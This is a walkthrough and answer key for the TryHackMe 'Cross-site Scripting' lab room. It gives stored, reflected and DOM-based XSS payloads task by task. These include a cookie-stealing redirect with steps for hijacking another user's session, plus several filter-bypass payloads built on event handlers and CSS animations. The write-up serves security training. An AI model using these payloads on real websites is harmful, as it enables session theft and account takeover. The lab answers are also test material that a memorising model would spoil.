This is the write up for the room Cross-site Scripting on Tryhackme and it is part of the Web Fundamentals Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.
Tasks Cross-site Scripting
Task 1
Read all that is in this task and press complete
Task 2
Start the machine attached to this task. The navigate to http://MACHINE_IP
Task 3
Read all that is in the task
3.1 Add a comment and see if you can insert some of your own HTML.
Basicly any HTML tag will to
type in the following
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>
<h1>This is a Heading</h1>
<p>This is a paragraph.</p>
</body>
</html> 
3.2 Create an alert popup box appear on the page with your document cookies.
document.cookie is the script command to get the current cookie
Type in the following
<script>alert(document.cookie)</script>
3.3 Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.
This can be done with HTML tag. Type in the following
<script>document.querySelector('#thm-title').textContent = 'I am a Hacker'</script>The answer of this question will reveal itself in on the page. Not in a popup
3.4 Take over Jack’s account by stealing his cookie, what was his cookie value?
As the hint is saying they made things easy to write it to the log
Type in the following
<script>document.location='/log/'+document.cookie</script> Now navigate to http://MACHINE_IP/logs
See the cookie
Now copy the cookie ( after connect.sid). This is also the answer of the question
3.5 Post a comment as Jack.
Now we still have to cookie. press F12 when on the page and select storage
Change the value of this cookie to the one in the Log
Reload the page and port a comment
Task 4
4.1 Craft a reflected XSS payload that will cause a popup saying “Hello”
Type in the following also notice the URL
<script>alert("Hello")</script>4.2 Craft a reflected XSS payload that will cause a popup with your machines IP address.
Type in the following
<script>alert(window.location.hostname)</script>Task 5
5.1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
Type in the folowing
test" onmouseover="alert('Hover over the image and inspect the image element')"Now move the mouse over the image not found tekst. A popup will reveal. So we now know it is working
Type in the following command
test" onmouseover="alert(document.cookie)"
The next popup will have the answer
5.2 Create an onhover event on an image tag, that change the background color of the website to red.
Type in the following code
test" onmouseover="document.body.style.backgroundColor = 'red';Task 6
Read all that is in the task navigate to the IP and port Scanning with XSS tab and read the explanation of the code. Press complete when ready
Task 7
You can copy and paste the code in the key logger and put it in the stored XXS
Task 8
8.1 Bypass the filter that removes any script tags.
<img src=x onerror=alert('Hello');>8.2 The word alert is filtered, bypass it.
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"8.3 The word hello is filtered, bypass it.
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>8.4 Filtered in challenge 4 is as follows:
- word “Hello”
- script
- onerror
- onsubmit
- onload
- onmouseover
- onfocus
- onmouseout
- onkeypress
- onchange
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>Task 9
Read all that is in the task and press complete
